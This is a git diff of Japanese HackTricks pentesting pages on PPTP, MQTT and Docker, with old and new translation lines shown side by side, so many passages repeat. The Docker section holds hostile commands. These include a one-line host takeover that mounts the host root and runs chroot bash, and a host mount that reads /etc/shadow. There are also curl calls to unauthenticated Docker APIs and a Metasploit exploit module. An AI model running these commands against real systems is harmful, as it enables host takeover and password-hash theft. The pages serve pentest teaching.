* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**してください。
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
**Point-to-Point Tunneling Protocol (PPTP)** は、**モバイルデバイスへのリモートアクセス**に広く使用される方法です。**TCPポート1723**を使用して鍵の交換を行い、**IPプロトコル47**(汎用ルーティングカプセル化、または**GRE**)を使用して、ピア間で送信されるデータを暗号化します。このセットアップは、インターネット上で安全な通信チャネルを確立するために重要であり、交換されるデータが機密保持され、不正アクセスから保護されることを保証します。
**ポイントツーポイントトンネリングプロトコルPPTP**は、モバイルデバイスへの**リモートアクセス**に広く使用される方法です。鍵の交換には**TCPポート1723**が使用され、データの暗号化には**IPプロトコル47**(ジェネリックルーティングカプセル化、または**GRE**)が使用され、ピア間で送信されるデータが暗号化されます。このセットアップは、インターネット上で安全な通信チャネルを確立するために重要であり、交換されるデータが機密保持され、未承認のアクセスから保護されることを保証します。
**デフォルトポート**:1723
@ -39,7 +53,7 @@ HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

108
network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View file

@ -2,21 +2,35 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)を**フォロー**する
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、彼らのエンジンを**無料**で試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
**MQ Telemetry TransportMQTT**は、**パブリッシュ/サブスクライブメッセージングプロトコル**として知られ、その極端な単純さと軽さが特徴です。このプロトコルは、デバイスが能力が限られており、低帯域幅、高遅延、または信頼性の低い接続が特徴付けられるネットワーク上で動作する環境に特に適しています。MQTTの主な目標には、ネットワーク帯域幅の使用を最小限に抑え、デバイスリソースへの要求を削減することが含まれます。さらに、信頼性のある通信を維持し、一定レベルの配信保証を提供することを目指しています。これらの目標により、MQTTは**機械間通信M2M**および**モのインターネットIoT**の急成長する分野に非常に適しており、効率的に多くのデバイスを接続することが不可欠です。さらに、MQTTは、帯域幅とバッテリー寿命を節約することが重要なモバイルアプリケーションに非常に有益です。
**MQ Telemetry TransportMQTT**は、**パブリッシュ/サブスクライブメッセージングプロトコル**として知られ、その極端な単純さと軽さが特徴です。このプロトコルは、デバイスが能力が限られており、低帯域幅、高遅延、または信頼性の低い接続が特徴ネットワーク上で動作する環境に特に適しています。MQTTの主な目標は、ネットワーク帯域幅の使用を最小限に抑え、デバイスリソースの需要を削減することです。さらに、信頼性のある通信を維持し、一定レベルの配信保証を提供することを目指しています。これらの目標により、MQTTは**機械間通信M2M**および**モのインターネットIoT**の急成長する分野に非常に適しており、効率的に多くのデバイスを接続することが不可欠です。さらに、MQTTは、帯域幅とバッテリー寿命を節約することが重要なモバイルアプリケーションに非常に有益です。
**デフォルトポート:** 1883
```
@ -25,7 +39,7 @@ PORT STATE SERVICE REASON
```
## トラフィックの検査
MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パケットが返されます。このパケットには接続状態を理解するために重要な戻りコードが含まれています。**0x00**の戻りコードは、資格情報が受け入れられたことを示し、接続が成功したことを意味します。一方、**0x05**の戻りコードは、資格情報が無効であることを示し、したがって接続を防ぎます。
MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パケットが返されます。このパケットには接続状態を理解するために重要な戻りコードが含まれています。**0x00**の戻りコードは、資格情報が受け入れられたことを示し、成功した接続を意味します。一方、**0x05**の戻りコードは、資格情報が無効であることを示し、したがって接続を防ぎます。
たとえば、ブローカーが無効な資格情報のために接続を拒否する場合、シナリオは次のようになります:
```
@ -40,15 +54,17 @@ MQTTブローカーが**CONNECT**パケットを受信すると、**CONNACK**パ
## MQTTのPentesting
**認証は完全にオプション**であり、認証が行われていても**デフォルトでは暗号化されていません**資格情報は平文で送信されます。MITM攻撃はパスワードを盗むために実行できます。
**認証は完全にオプション**であり、認証が行われていても**デフォルトでは暗号化されていません**資格情報は平文で送信されます。MITM攻撃はまだ実行可能で、パスワードを盗むことができます。
MQTTサービスに接続するには、[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell)を使用して、次の操作を行います。
MQTTサービスに接続するには、[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell)を使用し、次のようにすべてのトピックに自分自身をサブスクライブできます:
```
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
> subscribe "#" 1
> subscribe "$SYS/#"
```
あなたは[**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)を使用することもできます。
You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
You can also use:
```bash
apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
@ -83,57 +99,69 @@ client.loop_start()
if __name__ == "__main__":
main()
```
## もっと情報
## より詳しい情報
こちらから: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
### パブリッシュ/サブスクライブパターン <a href="#b667" id="b667"></a>
### パブリッシュ/サブスクライブ パターン <a href="#b667" id="b667"></a>
パブリッシュ/サブスクライブモデルは以下で構成されています:
- **パブリッシャー**: メッセージをブローカー内の1つまたは複数のトピックに公開します。
- **サブスクライバー**: ブローカー内の1つまたは複数のトピックにサブスクライブし、パブリッシャーから送信されたすべてのメッセージを受信します。
- **ブローカー**: パブリッシャーからのすべてのメッセージをサブスクライバーにルーティングします。
- **トピック**: 1つ以上のレベルで構成され、スラッシュで区切られたものです(例: /smartshouse/livingroom/temperature
* **パブリッシャー**: ブローカー内の1つ以上のトピックにメッセージを公開します。
* **サブスクライバー**: ブローカー内の1つ以上のトピックに購読し、パブリッシャーから送信されたすべてのメッセージを受信します。
* **ブローカー**: パブリッシャーからのすべてのメッセージをサブスクライバーにルーティングします。
* **トピック**: 1つ以上のレベルで構成され、スラッシュで区切られたものです (例: /smartshouse/livingroom/temperature)
### パケット形式 <a href="#f15a" id="f15a"></a>
すべてのMQTTパケットには固定ヘッダーが含まれています図02。図02: 固定ヘッダー
すべてのMQTTパケットには固定ヘッダーが含まれています (図02)。図02: 固定ヘッダー
![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png)
### パケットタイプ
- CONNECT1: クライアントがサーバーへの接続を要求するために初期化されます。
- CONNACK2: 成功した接続のサーバーからの確認。
- PUBLISH3: クライアントからサーバー、またはその逆方向にメッセージを送信するために使用されます。
- PUBACK4: PUBLISHパケットの確認
- PUBREC5: メッセージが受信されたことを確認するメッセージ配信プロトコルの一部。
- PUBREL6: メッセージ配信のさらなる確認で、メッセージリリースを示します。
- PUBCOMP7: メッセージ配信プロトコルの最終部分で、完了を示します。
- SUBSCRIBE8: クライアントがトピックからのメッセージを聞くためのリクエスト。
- SUBACK9: SUBSCRIBEリクエストのサーバーからの確認。
- UNSUBSCRIBE10: クライアントがトピックからのメッセージ受信を停止するためのリクエスト。
- UNSUBACK11: UNSUBSCRIBEリクエストへのサーバーの応答。
- PINGREQ12: クライアントが送信するハートビートメッセージ。
- PINGRESP13: ハートビートメッセージへのサーバーの応答。
- DISCONNECT14: クライアントが接続を終了するために初期化されます。
- 0と15の2つの値は予約されており、使用が禁止されています。
* CONNECT (1): クライアントがサーバーへの接続を要求するために開始されます。
* CONNACK (2): 成功した接続のサーバーからの確認です
* PUBLISH (3): クライアントからサーバー、またはその逆にメッセージを送信するために使用されます。
* PUBACK (4): PUBLISHパケットの確認です
* PUBREC (5): メッセージが受信されたことを確認するメッセージ配信プロトコルの一部です
* PUBREL (6): メッセージ配信のさらなる確認で、メッセージリリースを示します。
* PUBCOMP (7): メッセージ配信プロトコルの最終部分で、完了を示します。
* SUBSCRIBE (8): クライアントがトピックからのメッセージを聞くためのリクエストです
* SUBACK (9): SUBSCRIBEリクエストのサーバーからの確認です
* UNSUBSCRIBE (10): クライアントがトピックからのメッセージ受信を停止するためのリクエストです
* UNSUBACK (11): UNSUBSCRIBEリクエストへのサーバーの応答です
* PINGREQ (12): クライアントが送信するハートビートメッセージです
* PINGRESP (13): ハートビートメッセージへのサーバーの応答です
* DISCONNECT (14): クライアントが接続を終了するために開始します。
* 0と15の2つの値は予約されており、使用が禁止されています。
## Shodan
- `port:1883 MQTT`
* `port:1883 MQTT`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>と一緒に**ゼロからヒーローまでAWSハッキングを学ぶ**</summary>
HackTricksをサポートする他の方法:
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)を**フォロー**する
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

149
network-services-pentesting/2375-pentesting-docker.md
View file

@ -1,32 +1,48 @@
# 2375, 2376 Dockerの侵入テスト
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**@carlospolopm**をフォローする。
- **ハッキングトリックを共有する**には、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
- **Discordグループ**に**参加**する💬https://discord.gg/hRep4RUj7fまたは[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で**フォロー**する[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>
## Dockerの基礎
## WhiteIntel
### 何ですか
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Dockerは**コンテナ化業界**の**最先端プラットフォーム**であり、**継続的な革新**を牽引しています。これにより、**従来から未来志向まで**のアプリケーションの**簡単な作成と配布**が可能となり、さまざまな環境での**安全な展開**が保証されます。
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックする**無料**機能を提供しています。
### 基本的なDockerアーキテクチャ
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
- **[containerd](http://containerd.io)**: これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**であり、**イメージの転送と保存**、さらにはコンテナの**実行、監視、ネットワーキング**を担当します。containerdに関する**詳細な洞察**が**さらに探求**されます。
- **コンテナシム**は、**ヘッドレスコンテナ**の取り扱いにおいて**中間業者**として重要な役割を果たし、コンテナが初期化された後に**runc**からシームレスに引き継ぎます。
- **[runc](http://runc.io)**: 軽量で普遍的なコンテナランタイム機能で高く評価されており、OCI標準に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**起動および管理**するためにcontainerdによって使用され、元の**libcontainer**から進化しました。
- **[grpc](http://www.grpc.io)**は、containerdと**dockerエンジン**の間の**効率的な相互作用**を確保するために**コミュニケーションを促進**するために不可欠です。
- **[OCI](https://www.opencontainers.org)**は、ランタイムとイメージのための**OCI仕様**を維持する上で重要であり、最新のDockerバージョンは**OCIイメージおよびランタイム**標準の両方に**準拠**しています。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
### 基本的なコマンド
{% embed url="https://whiteintel.io" %}
---
### Dockerの基礎
#### 何を指すか
Dockerは**コンテナ化業界**の**最前線プラットフォーム**であり、**継続的な革新**を牽引しています。これにより、**伝統的なものから未来志向のアプリケーション**の簡単な作成と配布が可能となり、さまざまな環境での**安全な展開**が保証されます。
#### 基本的なDockerアーキテクチャ
- [**containerd**](http://containerd.io):これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**であり、**イメージの転送と保存**、さらにはコンテナの**実行、監視、ネットワーキング**を取り扱います。containerdに関する**詳細な洞察**は**さらに探求**されます。
- **コンテナシム**は、**ヘッドレスコンテナ**の取り扱いにおいて**中間者**として重要な役割を果たし、コンテナが初期化された後に**runc**からシームレスに引き継ぎます。
- [**runc**](http://runc.io):その**軽量で汎用的なコンテナランタイム**機能で高く評価されており、OCI標準に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**開始および管理**するためにcontainerdによって使用され、元の**libcontainer**から進化しました。
- [**grpc**](http://www.grpc.io)は、containerdと**dockerエンジン**の間の**効率的な相互作用**を確保するために不可欠であり、**通信**を**容易に**します。
- [**OCI**](https://www.opencontainers.org)は、最新のDockerバージョンが**OCIイメージおよびランタイム**標準の両方に**準拠**している**OCI仕様**を維持する上で重要です。
#### 基本的なコマンド
```bash
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
docker info #Get more infomarion about docker settings
@ -49,13 +65,13 @@ docker system prune -a
# - all images without at least one container associated to them
# - all build cache
```
### Containerd
#### Containerd
**Containerd**は、**DockerやKubernetes**などのコンテナプラットフォームのニーズを満たすために特に開発されました。これは、Linux、Windows、Solarisなどのさまざまなオペレーティングシステムでのコンテナの実行を**簡素化**することを目指しており、オペレーティングシステム固有の機能とシステムコールを抽象化しています。Containerdの目標は、ユーザーが必要とする基本的な機能のみを含めることであり、不要なコンポーネントを省略することを目指しています。ただし、この目標を完全に達成することは困難であると認識されています。
**Containerd**は、**DockerやKubernetes**などのコンテナプラットフォームのニーズを満たすために特に開発されました。これは、Linux、Windows、Solarisなどのさまざまなオペレーティングシステムでのコンテナの実行を**簡素化**することを目指しており、オペレーティングシステム固有の機能とシステムコールを抽象化しています。Containerdの目標は、ユーザーが必要とする基本的な機能のみを含め、不要なコンポーネントを省略することす。ただし、この目標を完全に達成することは困難であると認識されています。
重要な設計上の決定の1つは、**Containerdがネットワーキングを処理しない**ということです。ネットワーキングは、分散システムにおいて重要な要素と見なされ、Software Defined NetworkingSDNやサービスディスカバリなどの複雑さが、プラットフォームによって大きく異なます。そのため、Containerdはネットワーキングの側面をサポートするプラットフォームに管理させることにしています。
重要な設計上の決定の1つは、**Containerdがネットワーキングを処理しない**ということです。ネットワーキングは、ソフトウェア定義ネットワーキングSDNやサービスディスカバリなどの複雑さがあり、プラットフォームによって大きく異なる要素と見なされます。そのため、Containerdはネットワーキングの側面をサポートするプラットフォームに管理させることにしています。
**DockerはContainerdを利用**してコンテナを実行しますが、ContainerdはDockerの機能の一部しかサポートしていないことに注意することが重要です。具体的には、ContainerdにはDockerに存在するネットワーク管理機能が欠けており、Dockerスワームの直接的な作成をサポートしていません。この違いは、Containerdがコンテナランタイム環境としての専門的な役割を強調し、より専門的な機能を統合するプラットフォームに委任していることを示しています。
**DockerはContainerdを利用**してコンテナを実行しますが、ContainerdはDockerの機能の一部しかサポートしていないことに注意することが重要です。具体的には、ContainerdにはDockerに存在するネットワーク管理機能が欠けており、Dockerスワームの直接的な作成をサポートしていません。この違いは、Containerdがコンテナランタイム環境としての専門的な機能をプラットフォームに委任し、より専門化された機能を提供することを強調しています。
```bash
#Containerd CLI
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
@ -71,19 +87,17 @@ ctr tasks resume <containerName> #Resume cotainer
ctr task kill -s SIGKILL <containerName> #Stop running container
ctr container delete <containerName>
```
### Podman
#### Podman
**Podman**は、[Open Container Initiative (OCI)の標準](https://github.com/opencontainers)に準拠したオープンソースのコンテナエンジンであり、Red Hatによって開発およびメンテナンスされています。**デーモンレスアーキテクチャ**と**rootlessコンテナ**のサポートなど、いくつかの独自の機能により、Dockerとは異なる特徴を持っています。これにより、ユーザーはルート権限なしでコンテナを実行できます。
**Podman**は、Red Hatによって開発および維持されている、[Open Container Initiative (OCI)の標準](https://github.com/opencontainers)に準拠したオープンソースのコンテナエンジンです。Dockerとは異なり、**デーモンレスアーキテクチャ**と**rootlessコンテナ**のサポートなど、いくつかの独自の機能を備えています。これにより、ユーザーはroot権限なしでコンテナを実行できます。
PodmanはDockerのAPIと互換性があり、Docker CLIコマンドの使用が可能です。この互換性は、コンテナイメージのビルドに使用される**Buildah**や、プッシュ、プル、およびインスペクトなどのイメージ操作に使用される**Skopeo**などのツールを含むエコシステムにも適用されます。これらのツールの詳細については、[GitHubページ](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
PodmanはDockerのAPIと互換性があり、Docker CLIコマンドを使用できます。この互換性は、コンテナイメージのビルドに使用される**Buildah**や、プッシュ、プル、およびインスペクトなどのイメージ操作を行う**Skopeo**などのツールを含むエコシステムにも適用されます。これらのツールの詳細については、[GitHubページ](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
**主な違い**
- **アーキテクチャ**Dockerのクライアントサーバーモデルとは異なり、バックグラウンドデーモンなしで動作するPodman。この設計により、コンテナは起動したユーザーの権限で実行されるため、ルートアクセスが不要となり、セキュリティが向上します。
- **Systemd統合**Podmanは**systemd**と統合されており、systemdユニットを介してコンテナを管理できます。これは、Dockerが主にDockerデーモンプロセスを管理するためにsystemdを使用するのとは対照的です。
- **Rootlessコンテナ**Podmanの重要な機能の1つは、コンテナを起動するユーザーの権限でコンテナを実行できることです。このアプローチにより、攻撃者が侵入したユーザーの権限のみを取得し、ルートアクセスを得ることができないため、コンテナ侵害に関連するリスクが最小限に抑えられます。
* **アーキテクチャ**Dockerのクライアントサーバーモデルとは異なり、Podmanはデーモンなしで動作します。この設計により、コンテナは起動したユーザーの権限で実行されるため、rootアクセスが不要となり、セキュリティが向上します。
* **Systemd統合**Podmanは**systemd**と統合されており、systemdユニットを介してコンテナを管理できます。これは、Dockerが主にDockerデーモンプロセスを管理するためにsystemdを使用するのとは対照的です。
* **Rootlessコンテナ**Podmanの重要な機能の1つは、コンテナを起動したユーザーの権限で実行できることです。このアプローチにより、攻撃者が侵入したユーザーの権限のみを取得し、rootアクセスを得ることができないため、コンテナ侵害に関連するリスクが最小限に抑えられます。
Podmanのアプローチは、ユーザー権限の管理と既存のDockerワークフローとの互換性を重視した、安全で柔軟なDockerの代替手段を提供しています。
@ -97,7 +111,7 @@ podman ls
```
{% endhint %}
## 基本情報
### 基本情報
リモートAPIは、有効になっている場合、デフォルトで2375ポートで実行されています。デフォルトでは認証が必要ないため、攻撃者は特権のあるDockerコンテナを起動することができます。リモートAPIを使用することで、ホスト/(ルートディレクトリ)をコンテナにアタッチし、ホスト環境のファイルを読み書きすることができます。
@ -106,11 +120,11 @@ podman ls
PORT STATE SERVICE
2375/tcp open docker
```
## 列挙
### 列挙
### 手動
#### 手動
Docker APIを列挙するためには、`docker`コマンドや次の例のように`curl`を使用できます。
Docker APIを列挙するためには、次の例のように`docker`コマンドや`curl`を使用できます。
```bash
#Using curl
curl -s http://open.docker.socket:2375/version | jq #Get version
@ -146,19 +160,19 @@ docker-init:
Version: 0.18.0
GitCommit: fec3683
```
**リモートDocker APIに`docker`コマンドで接続できる場合**、サービスとやり取りするために[**以前にコメントされたdockerコマンド**](2375-pentesting-docker.md#basic-commands)の**いずれかを実行**できます。
**リモートdocker APIに`docker`コマンドで接続できる場合**、サービスとやり取りするために[**以前に**コメントされた**docker**コマンド**を実行**できます。
{% hint style="info" %}
`export DOCKER_HOST="tcp://localhost:2375"`を使用して、dockerコマンドで`-H`パラメータを**使用せずに**設定できます。
`export DOCKER_HOST="tcp://localhost:2375"`を使用して、dockerコマンドで`-H`パラメータを使用しないように**する**ことができます。
{% endhint %}
#### 速い特権昇格
**高速特権昇格**
```bash
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
#### Curl
**Curl**
時々、**TLS** エンドポイントで **2376** が見られます。docker クライアントで接続できないことがありますが、curl を使用して接続することが可能です。
時々、**TLS**エンドポイントで**2376**が見られます。dockerクライアントで接続できないことがありますが、curlを使用して接続することが可能です。
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -188,12 +202,12 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
#Delete stopped containers
curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
```
### 自動
#### 自動
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
## Compromising
### Compromising
以下のページでは、**Dockerコンテナから脱出する方法**を見つけることができます:
@ -208,16 +222,16 @@ cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
## 特権昇格
### 特権昇格
Dockerを使用しているホスト内にいる場合は、[**この情報を読んで特権を昇格しようとしてください**](../linux-hardening/privilege-escalation/#writable-docker-socket)。
ホスト内でDockerを使用している場合は、[**この情報を読んで特権を昇格しよう**](../linux-hardening/privilege-escalation/#writable-docker-socket)。
## 実行中のDockerコンテナ内の秘密の発見
### 実行中のDockerコンテナ内の秘密の発見
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
```
**env**(環境変数セクション)をチェックしてシークレットを見つけることができます:
**env**(環境変数セクション)をチェックして、秘密情報を見つけることができます:
- パスワード。
- IPアドレス。
@ -229,51 +243,51 @@ docker inspect <docker_id>
```bash
docker cp <docket_id>:/etc/<secret_01> <secret_01>
```
## Dockerのセキュリティ強化
### Dockerのセキュリティ強化
### Dockerのインストールと使用のセキュリティ強化
#### Dockerのインストールと使用のセキュリティ強化
* 現在のDockerインストールを調査するために[https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security)ツールを使用できます。
* `./docker-bench-security.sh`
* 現在のDockerインストールを調査するために[https://github.com/kost/dockscan](https://github.com/kost/dockscan)ツールを使用できます。
* `dockscan -v unix:///var/run/docker.sock`
* 異なるセキュリティオプションで実行される場合のコンテナの権限を調べるために[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)ツールを使用できます。これは、コンテナを実行する際に一部のセキュリティオプションを使用することの影響を知るのに役立ちます
* 異なるセキュリティオプションで実行される場合のコンテナの権限を調べるために[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)ツールを使用できます。これは、コンテナを実行する際に一部のセキュリティオプションを使用することの影響を知るのに役立ちます
* `docker run --rm -it r.j3ss.co/amicontained`
